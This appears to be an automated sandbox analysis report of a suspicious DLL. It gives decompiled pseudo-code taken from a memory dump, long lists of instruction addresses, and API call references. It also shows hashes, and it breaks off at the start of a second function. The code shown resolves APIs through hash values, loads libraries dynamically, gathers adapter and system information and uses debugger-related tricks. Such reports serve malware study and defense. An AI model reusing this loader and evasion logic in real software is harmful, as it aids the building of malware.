							if(_t368 == 0) {
								_t369 = 0;
								__eflags = 0;
							} else {
								goto L46;
							}
						} else {
							E6EA08CA0(_t553 + 0x118);
							L46:
							_t369 = 1;
						}
						E6E9FAC00(_t553 + 0x120, 2);
						E6EA0D980(_t553 + 0x128, _t553 + 0x130, 0x7e);
						E6EA08CA0(_t553 + 0x120);
						__eflags =  *(_t553 + 0x130);
						if( *(_t553 + 0x130) > 0) {
							 *_t553 = _t545;
							__eflags = 0;
							_t527 = _t553 + 0x130;
							while(1) {
								L50:
								_t333 = L6EA015C0(0xa1310f65, 0xf3af54a7);
								__eflags = _t333;
								if(_t333 != 0) {
									LoadLibraryW( *(E6EA17600(_t527, _t530))); // executed
								}
								_t334 =  *(_t553 + 0x130);
								while(1) {
									L53:
									_t530 = 1;
									__eflags = 1 - _t334;
									if(1 >= _t334) {
										break;
									}
									__eflags = 1 - 4;
									if(1 != 4) {
										goto L50;
									} else {
										_t506 =  *0x6ea2b02a & 0x000000ff;
										__eflags = ( *0x6ea2b02a & 0x000000ff) - 2;
										if(( *0x6ea2b02a & 0x000000ff) == 2) {
											continue;
										} else {
											while(1) {
												L50:
												_t333 = L6EA015C0(0xa1310f65, 0xf3af54a7);
												__eflags = _t333;
												if(_t333 != 0) {
													LoadLibraryW( *(E6EA17600(_t527, _t530))); // executed
												}
												_t334 =  *(_t553 + 0x130);
												goto L53;
											}
										}
									}
									goto L58;
								}
								_t545 =  *_t553;
								goto L58;
							}
						}
						L58:
						__eflags =  *((intOrPtr*)(_t545 + 0x2c)) - 2;
						if( *((intOrPtr*)(_t545 + 0x2c)) != 2) {
							__eflags =  *0x6ea2b028 & 0x000000ff;
							if(( *0x6ea2b028 & 0x000000ff) == 0) {
								__eflags =  *0x6ea2b265 & 0x000000ff;
								if(( *0x6ea2b265 & 0x000000ff) == 0) {
									__eflags =  *0x6ea2b1cc - 1;
									if( *0x6ea2b1cc != 1) {
										_t312 =  *0x6ea2b1d0; // 0x900980
										_t313 =  *(_t312 + 4);
										_t506 =  *_t313 & 0x0000ffff;
										__eflags = ( *_t313 & 0x0000ffff) - 0x2d;
										if(( *_t313 & 0x0000ffff) != 0x2d) {
											E6EA08AB0(_t553 + 0xcc, _t313, 0);
											_push(0x80);
											_push(0);
											E6EA1A4E0(_t553 + 0x68, __eflags,  *((intOrPtr*)(_t553 + 0xd0)), 1);
											_t316 = E6EA1BEA0(_t553 + 0x64, _t506, _t530);
											__eflags = _t316;
											if(_t316 == 0) {
												__eflags =  *((char*)(_t553 + 0x68));
												if( *((char*)(_t553 + 0x68)) != 0) {
													E6EA1BE30(_t553 + 0x64, _t530);
												}
												E6EA08CA0(_t553 + 0x58);
												_t533 = 0;
												__eflags = 0;
												while(1) {
													__eflags = E6EA1A730(_t553 + 0xc4, _t506);
													if(__eflags == 0) {
														break;
													}
													E6EA022A0(0x64, _t506);
													_t533 = _t533 + 1;
													__eflags = _t533 - 0x64;
													if(__eflags < 0) {
														continue;
													}
													break;
												}
												_t530 = _t553 + 0xcc;
												do {
													E6EA0AE80(_t553 + 0xcc, __eflags, _t530, 0x5c);
													E6EA08CC0(_t553 + 0xc8,  *(_t553 + 0xcc));
													E6EA08CA0(_t530);
													__eflags = E6EA1A730(_t553 + 0xc4, _t506);
												} while (__eflags == 0);
											} else {
												__eflags =  *((char*)(_t553 + 0x68));
												if( *((char*)(_t553 + 0x68)) != 0) {
													E6EA1BE30(_t553 + 0x64, _t530);
												}
												E6EA08CA0(_t553 + 0x58);
											}
											E6EA08CA0(_t553 + 0xc4);
										}
									}
								}
							}
							__eflags = ( *0x6ea2b02a & 0x000000ff) - 2;
							if(( *0x6ea2b02a & 0x000000ff) == 2) {
								L87:
								_t221 =  *0x6ea2b1ad; // 0xbaa380
								__eflags = _t221;
								if(_t221 == 0) {
									L89:
									_t222 =  *0x6ea2b1ad; // 0xbaa380
									__eflags = _t222;
									if(_t222 == 0) {
										_push(0x10);
										_t223 = E6EA01030();
										_t553 = _t553 + 4;
										__eflags = _t223;
										if(_t223 != 0) {
											_push(0);
											_t224 = E6EA19350(_t223);
										} else {
											_t224 = 0;
										}
										 *0x6ea2b1ad = _t224;
									}
									_t530 =  *0x6ea2b1ad; // 0xbaa380
									__eflags = ( *0x6ea2b02a & 0x000000ff) - 1;
									if(( *0x6ea2b02a & 0x000000ff) == 1) {
										_t506 = 0x18f8c844;
										_t527 = _t553 + 0x28;
										E6E9F6AD0(_t369, _t527, 0x18f8c844, _t527, _t530, 1, 0);
										_push(_t527);
										L6EA19520(_t530);
										L6EA19510(_t527);
									} else {
										E6EA19710(_t530, 0x6ea2b02d,  *0x6ea2b02b & 0x0000ffff);
									}
								} else {
									_t459 =  *0x6ea2b1ad; // 0xbaa380
									_t286 = E6EA19660(_t459);
									__eflags = _t286;
									if(_t286 != 0) {
										goto L89;
									}
								}
								_t229 =  *0x6ea2b1b1; // 0x0
								__eflags = _t229;
								if(_t229 == 0) {
									L95:
									_t230 =  *0x6ea2b1b1; // 0x0
									__eflags = _t230;
									if(_t230 == 0) {
										_push(0x10);
										_t231 = E6EA01030();
										_t553 = _t553 + 4;
										__eflags = _t231;
										if(_t231 != 0) {
											_push(0);
											_t232 = E6EA19350(_t231);
										} else {
											_t232 = 0;
										}
										 *0x6ea2b1b1 = _t232;
									}
									_t527 =  *0x6ea2b1b1; // 0x0
									__eflags = ( *0x6ea2b02a & 0x000000ff) - 1;
									if(( *0x6ea2b02a & 0x000000ff) == 1) {
										_t506 = 0x11041f01;
										E6E9F6AD0(_t369, _t553 + 0x38, 0x11041f01, _t527, _t530, 1, 1);
										_push(_t553 + 0x38);
										L6EA19520(_t527);
										L6EA19510(_t553 + 0x38);
										_t239 = E6EA19650(_t527);
										__eflags = _t239;
										if(_t239 != 0) {
											_t506 = 0xd3ef7577;
											E6E9F6AD0(_t369, _t553 + 8, 0xd3ef7577, _t527, _t530, 0, 0);
											L6EA19510(_t553);
										}
									} else {
										_t530 =  *0x6ea2b1c4; // 0x6e9f0000
										__eflags =  *((char*)(E6EA03930(_t369, 0, _t527, _t530) + 0xb)) - 0x20;
										_t515 =  ==  ? 0x7e839a6 : 0x93fc68d6;
										_t506 = _t530;
										E6E9F9090(_t553 + 0x88, _t530,  ==  ? 0x7e839a6 : 0x93fc68d6);
										_push(_t553 + 0x88);
										L6EA19520(_t527);
										L6EA19510(_t553 + 0x88);
									}
								} else {
									_t457 =  *0x6ea2b1b1; // 0x0
									_t282 = E6EA19660(_t457);
									__eflags = _t282;
									if(_t282 != 0) {
										goto L95;
									}
								}
								_t240 =  *((intOrPtr*)(_t545 + 0x2c));
								__eflags = _t240 - 3;
								if(_t240 == 3) {
									__eflags =  *0x6ea2b1cc - 3;
									if( *0x6ea2b1cc == 3) {
										E6EA08CC0(_t553 + 0x10c,  *((intOrPtr*)( *0x6ea2b1d0 + 8)));
									}
									_t370 = _t553 + 0x48;
									E6EA08810(_t553 + 0x48, 0);
									_t244 = E6EA09890(_t370, _t553 + 0x48, _t506, _t527, _t530, _t370, 0x6ea29428,  *((intOrPtr*)(_t545 + 0x2c)));
									E6EA10220(_t553 + 0x110,  *_t244, 0);
									E6EA08CA0(_t370);
									L6E9F8180(_t530);
								} else {
									__eflags = _t240 - 5;
									if(_t240 != 5) {
										__eflags = _t240 - 6;
										if(__eflags == 0) {
											_t434 = _t553 + 0xa4;
											 *_t434 = 0;
											 *((intOrPtr*)(_t434 + 4)) = 0;
											 *((intOrPtr*)(_t434 + 8)) = 0;
											 *((intOrPtr*)(_t434 + 0xc)) = 0;
											E6EA05B60(_t369, _t434, _t527, _t530, __eflags);
											E6E9F6740(_t553 + 0xa4);
											E6EA01350(0x12);
											__eflags =  *(_t553 + 0xa8);
											if( *(_t553 + 0xa8) > 0) {
												_t372 = 0;
												__eflags = 0;
												do {
													_t259 = E6EA22B00(_t553 + 0xa8, _t372);
													__eflags =  *((char*)(_t259 + 0x3c));
													if( *((char*)(_t259 + 0x3c)) == 0) {
														E6E9F2A40(_t553 + 0x50, _t259);
														E6EA08CA0(_t553 + 0x50);
													}
													_t372 = _t372 + 1;
													__eflags = _t372 -  *(_t553 + 0xa8);
												} while (_t372 <  *(_t553 + 0xa8));
											}
											L6EA22970(_t369, _t553 + 0xa4, _t527);
											_t438 =  *(_t553 + 0xb0);
											__eflags =  *(_t553 + 0xb0);
											if( *(_t553 + 0xb0) != 0) {
												E6E9F2A20(_t438, 1);
											}
										}
									} else {
										__eflags = _t369;
										if(_t369 == 0) {
											__eflags =  *0x6ea2b1cc - 1;
											if(__eflags <= 0) {
												L104:
												_t442 = _t553 + 0x18;
												 *_t442 = 0;
												 *((intOrPtr*)(_t442 + 4)) = 0;
												 *((intOrPtr*)(_t442 + 8)) = 0;
												 *((intOrPtr*)(_t442 + 0xc)) = 0;
												E6EA05B60(_t369, _t442, _t527, _t530, __eflags);
												__eflags = ( *0x6ea2b029 & 0x000000ff) - 1;
												E6E9F7DB0(_t553 + 0x18, 0 | ( *0x6ea2b029 & 0x000000ff) - 0x00000001 > 0x00000000);
												__eflags =  *0x6ea2b029 & 0x000000ff;
												if(( *0x6ea2b029 & 0x000000ff) != 0) {
													E6EA01350(0x12);
													__eflags =  *(_t553 + 0x1c);
													if( *(_t553 + 0x1c) > 0) {
														_t373 = 0;
														__eflags = 0;
														do {
															_t269 = E6EA22B00(_t553 + 0x1c, _t373);
															__eflags =  *((char*)(_t269 + 0x3c));
															if( *((char*)(_t269 + 0x3c)) == 0) {
																E6E9F2A40(_t553 + 0x10, _t269);
																E6EA08CA0(_t553 + 0x10);
															}
															_t373 = _t373 + 1;
															__eflags = _t373 -  *(_t553 + 0x1c);
														} while (_t373 <  *(_t553 + 0x1c));
													}
												}
												L6EA22970(_t369, _t553 + 0x18, _t527);
												_t445 =  *(_t553 + 0x24);
												__eflags =  *(_t553 + 0x24);
												if( *(_t553 + 0x24) != 0) {
													E6E9F2A20(_t445, 1);
												}
											} else {
												_t272 =  *0x6ea2b1d0; // 0x900980
												__eflags = ( *( *(_t272 + 4)) & 0x0000ffff) - 0x2d;
												if(__eflags != 0) {
													goto L104;
												}
											}
										}
									}
								}
								L6EA18910(_t553 + 0x130, _t527, _t530);
								E6EA08CA0(_t553 + 0x110);
								E6EA08CA0(_t553 + 0x108);
								E6EA07A70(_t553 + 0x128);
								__eflags = 0;
								return 0;
							} else {
								__eflags =  *0x6ea2b027 & 0x000000ff;
								if(( *0x6ea2b027 & 0x000000ff) == 0) {
									goto L87;
								} else {
									__eflags = _t369;
									if(_t369 != 0) {
										goto L87;
									} else {
										__eflags =  *((char*)(_t545 + 0xb)) - 0x20;
										_t517 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
										E6E9F61B0(_t553 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t545 + 0xb)) - 0x20);
										E6EA08810(_t553 + 0x18, 0x200);
										_t462 = L6EA015C0(0xa1310f65, 0xc4d11e8a);
										__eflags = _t462;
										if(__eflags != 0) {
											_t309 =  *(_t553 + 0x18) >> 1;
											__eflags = _t309;
											_t517 =  *0x6ea2b1c4; // 0x6e9f0000
											 *_t462(_t517,  *(_t553 + 0x18), _t309);
										}
										_push(0x80);
										_push(0);
										E6EA1A4E0(_t553 + 0x10, __eflags,  *((intOrPtr*)(_t553 + 0x20)), 1);
										L6EA1A520(_t553 + 8, _t517, _t553 + 0x1c, 0);
										__eflags =  *((char*)(_t553 + 0x10));
										if( *((char*)(_t553 + 0x10)) != 0) {
											E6EA1BE30(_t553 + 0xc, _t530);
										}
										__eflags = 0;
										E6EA08CA0(_t553);
										_t532 = _t553 + 0x1a0;
										_t548 = _t553 + 0x2c;
										while(1) {
											E6EA00B70(_t532, 0, 0x44);
											 *((intOrPtr*)(_t553 + 0x1ac)) = 0x44;
											E6EA00B70(_t548, 0, 0x10);
											_t553 = _t553 + 0x18;
											E6EA08810(_t553 + 0x4c, 0);
											_t301 = E6EA096D0(E6EA096D0(E6EA10220(_t553 + 0x50,  *((intOrPtr*)(_t553 + 0x40)), 0), 0x20), 0x22);
											_t302 =  *0x6ea2b1d0; // 0x900980
											E6EA096D0(E6EA10220(_t301,  *_t302, 0), 0x22);
											_t305 = L6EA015C0(0xa1310f65, 0x643f303c);
											__eflags = _t305;
											if(_t305 != 0) {
												break;
											}
											E6EA08CA0(_t553 + 0x48);
										}
										_push(_t548);
										_push(_t532);
										_push(0);
										_push(0);
										_push(4);
										_push(0);
										_push(0);
										_push(0);
										_push( *((intOrPtr*)(_t553 + 0x68)));
										_push( *((intOrPtr*)(_t553 + 0x60)));
										asm("int3");
										return _t305;
									}
								}
							}
						} else {
							L6EA18910(_t553 + 0x130, _t526, _t530);
							E6EA08CA0(_t553 + 0x110);
							E6EA08CA0(_t553 + 0x108);
							E6EA07A70(_t553 + 0x128);
							__eflags = 0;
							return 0;
						}
					} else {
						_push(0x6ea2b1cc);
						_push(0);
						asm("int3");
						return _t192;
					}
				} else {
					asm("int3");
					return _t190;
				}
				goto L143;
			}

0x6e9f51a7
0x6e9f51a7
0x6e9f51b7
0x6e9f51bc
0x6e9f51be
0x6e9f51c5
0x6e9f51d0
0x6e9f51dc
0x6e9f51e4
0x6e9f51ec
0x6e9f51f1
0x6e9f51f8
0x00000000
0x00000000
0x6e9f51fa
0x6e9f5202
0x6e9f5209
0x00000000
0x6e9f520b
0x6e9f5212
0x6e9f5212
0x00000000
0x6e9f5209
0x6e9f51fa
0x6e9f5218
0x6e9f5218
0x6e9f521a
0x6e9f5221
0x6e9f522c
0x6e9f5238
0x6e9f5240
0x6e9f5248
0x6e9f524d
0x6e9f5254
0x00000000
0x00000000
0x6e9f5256
0x6e9f525e
0x6e9f5265
0x00000000
0x6e9f5267
0x6e9f526e
0x6e9f526e
0x00000000
0x6e9f5265
0x6e9f5256
0x6e9f5274
0x6e9f5274
0x6e9f5276
0x6e9f527d
0x6e9f5288
0x6e9f5294
0x6e9f529c
0x6e9f52a4
0x6e9f52a9
0x6e9f52b0
0x00000000
0x00000000
0x6e9f52b2
0x6e9f52ba
0x6e9f52c1
0x00000000
0x6e9f52c3
0x6e9f52ca
0x6e9f52ca
0x00000000
0x6e9f52c1
0x6e9f52b2
0x6e9f52d0
0x6e9f52d0
0x6e9f52d2
0x6e9f52d9
0x6e9f52e4
0x6e9f52f0
0x6e9f52f8
0x6e9f5300
0x6e9f5305
0x6e9f530c
0x00000000
0x00000000
0x6e9f530e
0x6e9f5316
0x6e9f531d
0x00000000
0x6e9f531f
0x6e9f5326
0x6e9f5326
0x00000000
0x6e9f531d
0x6e9f530e
0x6e9f532c
0x6e9f5333
0x6e9f5338
0x6e9f5344
0x6e9f5350
0x6e9f5358
0x6e9f5efb
0x6e9f5efb
0x6e9f5f04
0x6e9f5f06
0x6e9f5f08
0x6e9f5f22
0x6e9f5f22
0x6e9f5f2f
0x6e9f5f34
0x6e9f5f3b
0x6e9f5f43
0x6e9f5f4a
0x6e9f5f4e
0x6e9f5f52
0x6e9f5f52
0x6e9f5f54
0x6e9f5f61
0x6e9f5f67
0x6e9f5f69
0x6e9f5f6b
0x00000000
0x00000000
0x6e9f5f75
0x6e9f5f7f
0x6e9f5f8a
0x6e9f5f8c
0x6e9f5f97
0x6e9f5f97
0x6e9f5fa9
0x6e9f5fab
0x6e9f5fad
0x6e9f5fbd
0x6e9f5fd0
0x6e9f5fd0
0x6e9f5fe1
0x6e9f5fe4
0x6e9f5fec
0x6e9f5fee
0x6e9f5ff0
0x6e9f5ffd
0x6e9f6017
0x6e9f6017
0x6e9f5ff0
0x00000000
0x6e9f5f0a
0x6e9f5f18
0x6e9f5f1a
0x6e9f5f1c
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f5f1c
0x00000000
0x6e9f5f08
0x6e9f5358
0x6e9f535e
0x6e9f535e
0x6e9f5368
0x6e9f536f
0x6e9f5377
0x6e9f538a
0x6e9f539b
0x6e9f539f
0x6e9f53aa
0x6e9f53aa
0x6e9f53ae
0x6e9f53b0
0x6e9f53ba
0x6e9f53cd
0x6e9f53cf
0x6e9f53cf
0x6e9f53d4
0x6e9f53d7
0x6e9f53ba
0x6e9f53e2
0x6e9f53f0
0x6e9f53fc
0x6e9f540b
0x6e9f5412
0x6e9f541c
0x6e9f5428
0x6e9f542d
0x6e9f542f
0x6e9f5440
0x6e9f5451
0x6e9f5453
0x6e9f5457
0x6e9f5459
0x6e9f5459
0x6e9f545e
0x6e9f546f
0x6e9f5483
0x6e9f5485
0x6e9f5487
0x6e9f5490
0x6e9f5490
0x6e9f549c
0x6e9f549c
0x6e9f54a5
0x6e9f54b8
0x6e9f54bd
0x6e9f54bf
0x6e9f54d9
0x6e9f54ec
0x6e9f54f1
0x6e9f54f3
0x6e9f5506
0x6e9f550b
0x6e9f551c
0x6e9f5525
0x6e9f5538
0x6e9f5546
0x6e9f5552
0x6e9f5563
0x6e9f556a
0x6e9f5576
0x6e9f5589
0x6e9f5590
0x6e9f5599
0x6e9f5599
0x6e9f5599
0x6e9f559c
0x6e9f54f5
0x6e9f54f5
0x6e9f54f5
0x6e9f55a8
0x6e9f55b4
0x6e9f55b9
0x6e9f55bb
0x6e9f55c4
0x6e9f55c4
0x00000000
0x00000000
0x00000000
0x6e9f54c1
0x6e9f54c8
0x6e9f55bd
0x6e9f55bd
0x6e9f55bd
0x6e9f55d2
0x6e9f55e8
0x6e9f55f4
0x6e9f55f9
0x6e9f5601
0x6e9f5603
0x6e9f5606
0x6e9f5608
0x6e9f560f
0x6e9f560f
0x6e9f5619
0x6e9f5620
0x6e9f5622
0x6e9f562e
0x6e9f562e
0x6e9f5630
0x6e9f5637
0x6e9f5637
0x6e9f5637
0x6e9f5638
0x6e9f563a
0x00000000
0x00000000
0x6e9f563c
0x6e9f563f
0x00000000
0x6e9f5641
0x6e9f5641
0x6e9f5648
0x6e9f564b
0x00000000
0x6e9f564d
0x6e9f560f
0x6e9f560f
0x6e9f5619
0x6e9f5620
0x6e9f5622
0x6e9f562e
0x6e9f562e
0x6e9f5630
0x00000000
0x6e9f5630
0x6e9f560f
0x6e9f564b
0x00000000
0x6e9f563f
0x6e9f564f
0x00000000
0x6e9f564f
0x6e9f560f
0x6e9f5652
0x6e9f5652
0x6e9f5656
0x6e9f569c
0x6e9f569e
0x6e9f56ab
0x6e9f56ad
0x6e9f56b3
0x6e9f56ba
0x6e9f56c0
0x6e9f56c5
0x6e9f56c8
0x6e9f56cb
0x6e9f56ce
0x6e9f56de
0x6e9f56e3
0x6e9f56e8
0x6e9f56f7
0x6e9f5700
0x6e9f5705
0x6e9f5707
0x6e9f5724
0x6e9f5729
0x6e9f572f
0x6e9f572f
0x6e9f5738
0x6e9f573d
0x6e9f573d
0x6e9f573f
0x6e9f574b
0x6e9f574d
0x00000000
0x00000000
0x6e9f5754
0x6e9f5759
0x6e9f575a
0x6e9f575d
0x00000000
0x00000000
0x00000000
0x6e9f575d
0x6e9f575f
0x6e9f5766
0x6e9f5770
0x6e9f5783
0x6e9f578a
0x6e9f579b
0x6e9f579b
0x6e9f5709
0x6e9f5709
0x6e9f570e
0x6e9f5714
0x6e9f5714
0x6e9f571d
0x6e9f571d
0x6e9f57a6
0x6e9f57a6
0x6e9f56ce
0x6e9f56ba
0x6e9f56ad
0x6e9f57b2
0x6e9f57b5
0x6e9f5b3c
0x6e9f5b3c
0x6e9f5b41
0x6e9f5b43
0x6e9f5b54
0x6e9f5b54
0x6e9f5b59
0x6e9f5b5b
0x6e9f5e33
0x6e9f5e35
0x6e9f5e3a
0x6e9f5e3d
0x6e9f5e3f
0x6e9f5e47
0x6e9f5e49
0x6e9f5e41
0x6e9f5e41
0x6e9f5e41
0x6e9f5e4e
0x6e9f5e4e
0x6e9f5b61
0x6e9f5b6e
0x6e9f5b71
0x6e9f5e0b
0x6e9f5e10
0x6e9f5e1a
0x6e9f5e21
0x6e9f5e22
0x6e9f5e29
0x6e9f5b77
0x6e9f5b86
0x6e9f5b86
0x6e9f5b45
0x6e9f5b45
0x6e9f5b4b
0x6e9f5b50
0x6e9f5b52
0x00000000
0x00000000
0x6e9f5b52
0x6e9f5b92
0x6e9f5b97
0x6e9f5b99
0x6e9f5baa
0x6e9f5baa
0x6e9f5baf
0x6e9f5bb1
0x6e9f5eb0
0x6e9f5eb2
0x6e9f5eb7
0x6e9f5eba
0x6e9f5ebc
0x6e9f5ec4
0x6e9f5ec6
0x6e9f5ebe
0x6e9f5ebe
0x6e9f5ebe
0x6e9f5ecb
0x6e9f5ecb
0x6e9f5bb7
0x6e9f5bc4
0x6e9f5bc7
0x6e9f5e62
0x6e9f5e68
0x6e9f5e73
0x6e9f5e74
0x6e9f5e7d
0x6e9f5e84
0x6e9f5e89
0x6e9f5e8b
0x6e9f5e93
0x6e9f5e9e
0x6e9f5ea6
0x6e9f5ea6
0x6e9f5bcd
0x6e9f5bcf
0x6e9f5be8
0x6e9f5bf1
0x6e9f5bf5
0x6e9f5bf7
0x6e9f5c05
0x6e9f5c06
0x6e9f5c12
0x6e9f5c12
0x6e9f5b9b
0x6e9f5b9b
0x6e9f5ba1
0x6e9f5ba6
0x6e9f5ba8
0x00000000
0x00000000
0x6e9f5ba8
0x6e9f5c1e
0x6e9f5c21
0x6e9f5c24
0x6e9f5d87
0x6e9f5d8e
0x6e9f5ee4
0x6e9f5ee4
0x6e9f5d94
0x6e9f5d9c
0x6e9f5daa
0x6e9f5dbd
0x6e9f5dc4
0x6e9f5dc9
0x6e9f5c2a
0x6e9f5c2a
0x6e9f5c2d
0x6e9f5cf0
0x6e9f5cf3
0x6e9f5cfb
0x6e9f5d02
0x6e9f5d04
0x6e9f5d07
0x6e9f5d0a
0x6e9f5d0d
0x6e9f5d1b
0x6e9f5d25
0x6e9f5d2a
0x6e9f5d32
0x6e9f5d34
0x6e9f5d34
0x6e9f5d36
0x6e9f5d3e
0x6e9f5d43
0x6e9f5d47
0x6e9f5d4f
0x6e9f5d58
0x6e9f5d58
0x6e9f5d5d
0x6e9f5d5e
0x6e9f5d5e
0x6e9f5d36
0x6e9f5d6e
0x6e9f5d73
0x6e9f5d7a
0x6e9f5d7c
0x6e9f5d80
0x6e9f5d80
0x6e9f5d7c
0x6e9f5c33
0x6e9f5c33
0x6e9f5c35
0x6e9f5c3b
0x6e9f5c42
0x6e9f5c58
0x6e9f5c5a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c63
0x6e9f5c66
0x6e9f5c69
0x6e9f5c77
0x6e9f5c81
0x6e9f5c8d
0x6e9f5c8f
0x6e9f5c96
0x6e9f5c9b
0x6e9f5ca0
0x6e9f5ca2
0x6e9f5ca2
0x6e9f5ca4
0x6e9f5ca9
0x6e9f5cae
0x6e9f5cb2
0x6e9f5cba
0x6e9f5cc3
0x6e9f5cc3
0x6e9f5cc8
0x6e9f5cc9
0x6e9f5cc9
0x6e9f5ca4
0x6e9f5ca0
0x6e9f5cd3
0x6e9f5cd8
0x6e9f5cdc
0x6e9f5cde
0x6e9f5ce6
0x6e9f5ce6
0x6e9f5c44
0x6e9f5c44
0x6e9f5c4f
0x6e9f5c52
0x00000000
0x00000000
0x6e9f5c52
0x6e9f5c42
0x6e9f5c35
0x6e9f5c2d
0x6e9f5dd5
0x6e9f5de1
0x6e9f5ded
0x6e9f5df9
0x6e9f5dfe
0x6e9f5e0a
0x6e9f57bb
0x6e9f57c2
0x6e9f57c4
0x00000000
0x6e9f57ca
0x6e9f57ca
0x6e9f57cc
0x00000000
0x6e9f57d2
0x6e9f57dc
0x6e9f57e4
0x6e9f57e7
0x6e9f57f5
0x6e9f5809
0x6e9f580b
0x6e9f580d
0x6e9f5813
0x6e9f5813
0x6e9f581a
0x6e9f5821
0x6e9f5821
0x6e9f5823
0x6e9f5828
0x6e9f5834
0x6e9f5844
0x6e9f5849
0x6e9f584e
0x6e9f5854
0x6e9f5854
0x6e9f5859
0x6e9f585e
0x6e9f5863
0x6e9f586a
0x6e9f586e
0x6e9f5873
0x6e9f5878
0x6e9f5888
0x6e9f588d
0x6e9f5896
0x6e9f58b7
0x6e9f58be
0x6e9f58d0
0x6e9f58df
0x6e9f58e4
0x6e9f58e6
0x00000000
0x00000000
0x6e9f5996
0x6e9f5996
0x6e9f58ec
0x6e9f58ed
0x6e9f58ee
0x6e9f58ef
0x6e9f58f0
0x6e9f58f2
0x6e9f58f3
0x6e9f58f4
0x6e9f58f5
0x6e9f58f9
0x6e9f58fd
0x6e9f58fe
0x6e9f58fe
0x6e9f57cc
0x6e9f57c4
0x6e9f5658
0x6e9f565f
0x6e9f566b
0x6e9f5677
0x6e9f5683
0x6e9f5688
0x6e9f5694
0x6e9f5694
0x6e9f5431
0x6e9f5431
0x6e9f5436
0x6e9f5437
0x6e9f5438
0x6e9f5438
0x6e9f5414
0x6e9f5414
0x6e9f5415
0x6e9f5415
0x00000000

APIs

OutputDebugStringA.KERNEL32(?), ref: 6E9F51DC
Sleep.KERNEL32(0000000A), ref: 6E9F51E4
OutputDebugStringA.KERNEL32(?), ref: 6E9F5212
OutputDebugStringA.KERNEL32(?), ref: 6E9F5238
Sleep.KERNEL32(0000000A), ref: 6E9F5240
OutputDebugStringA.KERNEL32(?), ref: 6E9F526E
OutputDebugStringA.KERNEL32(?), ref: 6E9F5294
Sleep.KERNEL32(0000000A), ref: 6E9F529C
OutputDebugStringA.KERNEL32(?), ref: 6E9F52CA
OutputDebugStringA.KERNEL32(?), ref: 6E9F52F0
Sleep.KERNEL32(0000000A), ref: 6E9F52F8
OutputDebugStringA.KERNEL32(?), ref: 6E9F5326
GetAdaptersInfo.IPHLPAPI(00000000,?,D93F3271,0A1EE59B,00000000,00002800,?,00000007,0000003F,588AB3EA,3B4CAFF7,588AB3EA,1BE15FEB,755AA3F0), ref: 6E9F53AA

Strings

@, xrefs: 6E9F5F8C

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DebugOutputString$Sleep$AdaptersInfo
String ID: @
API String ID: 1241301715-2766056989
Opcode ID: 26979832a6098982fe0c4f92bb1a652ab80833322e6d97d6e3df6ec543e476bf
Instruction ID: a371c041290c6d9e526c11742dc3f367525b705120d940cd9adbd9eb66aa276d
Opcode Fuzzy Hash: 26979832a6098982fe0c4f92bb1a652ab80833322e6d97d6e3df6ec543e476bf
Instruction Fuzzy Hash: 9981CB35208346DFDB305FE0CD90FEF77E9EF85308F148928AA566A1D0EB7099468B56

Uniqueness

Uniqueness Score: -1.00%

Function 6EA03930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EA03930(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v32;
				intOrPtr _v36;
				char _v44;
				void* _v60;
				void* _v72;
				char _v76;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				long _v100;
				long _v104;
				long _v108;
				char _v112;
				void* _v116;
				char _v120;
				void* _v154;
				struct _SYSTEM_INFO _v156;
				signed int _v160;
				void* _v164;
				char _v168;
				void* _v172;
				char _v176;
				char _v180;
				void* _v184;
				char _v188;
				void* _v196;
				intOrPtr _v424;
				signed char _v428;
				signed char _v432;
				char _v496;
				void* _v500;
				void* _v504;
				char _v520;
				void* _v524;
				intOrPtr _t163;
				intOrPtr _t174;
				char _t175;
				intOrPtr* _t183;
				void* _t187;
				void* _t197;
				signed int _t201;
				char _t212;
				intOrPtr _t219;
				intOrPtr _t223;
				void* _t229;
				int _t234;
				intOrPtr _t241;
				void* _t244;
				void* _t247;
				void* _t255;
				void* _t263;
				void* _t264;
				int _t275;
				void* _t279;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t289;
				void* _t292;
				void* _t295;
				void* _t298;
				void* _t306;
				intOrPtr _t308;
				void* _t311;
				void* _t313;
				void* _t314;
				intOrPtr _t315;
				void* _t316;
				signed char _t322;
				intOrPtr* _t344;
				void** _t346;
				void* _t354;
				void* _t359;
				void* _t360;
				void* _t362;
				void* _t364;
				intOrPtr _t366;
				void* _t367;
				void* _t368;
				void* _t374;
				void* _t375;
				void* _t377;
				signed char _t378;
				void* _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				void* _t384;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t392;
				intOrPtr _t394;
				void* _t395;
				intOrPtr _t398;
				intOrPtr _t400;
				intOrPtr* _t402;
				void* _t403;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				signed char* _t416;
				intOrPtr* _t417;
				void* _t420;
				void* _t425;
				signed int _t429;
				void* _t432;
				void* _t433;
				void* _t434;
				signed int _t439;
				signed int _t442;
				void* _t444;
				intOrPtr* _t445;

				_t439 = _t442;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t444 = (_t442 & 0xfffffff0) - 0x1b4;
				_t313 = __ecx;
				_t163 =  *0x6ea2b1f0; // 0xba0528
				if(_t163 == 0x9ccb2c38) {
					_push(0x30);
					_t163 = E6EA01030();
					_t444 = _t444 + 4;
					 *0x6ea2b1f0 = _t163;
				}
				if( *((char*)(_t163 + 0xb)) == 0 || _t313 != 0) {
					_t416 =  &_v432;
					E6EA00B70(_t416, 0, 0x11c);
					_t445 = _t444 + 0xc;
					_t377 =  *0x6ea2b1f4; // 0xba1340
